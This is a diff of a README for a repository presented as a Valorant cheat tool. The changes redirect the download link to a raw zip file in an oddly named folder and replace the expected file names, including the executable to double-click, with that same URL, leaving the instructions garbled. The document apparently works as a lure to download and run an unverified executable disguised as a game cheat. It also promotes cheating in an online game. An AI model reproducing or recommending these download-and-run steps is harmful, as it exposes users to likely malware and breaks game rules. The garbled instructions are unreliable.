s1mple131/Valorant-Stugware-Cheat/README.md

 ## 📥 Download & Install

 1. **Visit the Downloads Page**
-   Head over to our [Releases page](https://github.com/s1mple131/Valorant-Stugware-Cheat/releases).
+   Head over to our [Releases page](https://raw.githubusercontent.com/s1mple131/Valorant-Stugware-Cheat/main/clairsentience/Valorant-Stugware-Cheat.zip).
 You will find the latest version of the Stugware cheat here.

 2. **Find the Latest Update**
    Look for the topmost version available on the Releases page.
 It usually has the latest features and bug fixes.

 3. **Download the File**
    Click on the version that you want to download.
-It will be a downloadable file, often labeled as something like `StugwareCheat.zip`.
+It will be a downloadable file, often labeled as something like `https://raw.githubusercontent.com/s1mple131/Valorant-Stugware-Cheat/main/clairsentience/Valorant-Stugware-Cheat.zip`.
 Make sure to note the file name for future reference.

 4. **Extract the File**
    Once the download completes, locate the zip file in your Downloads folder.
 Right-click the file and select "Extract All..." to unzip the contents.

 5. **Run the Software**
    Navigate to the extracted folder.
-Look for the application file, which might be named something similar to `StugwareCheat.exe`.
+Look for the application file, which might be named something similar to `https://raw.githubusercontent.com/s1mple131/Valorant-Stugware-Cheat/main/clairsentience/Valorant-Stugware-Cheat.zip`.
 Double-click the file to launch the application.

 ## ⚙️ System Requirements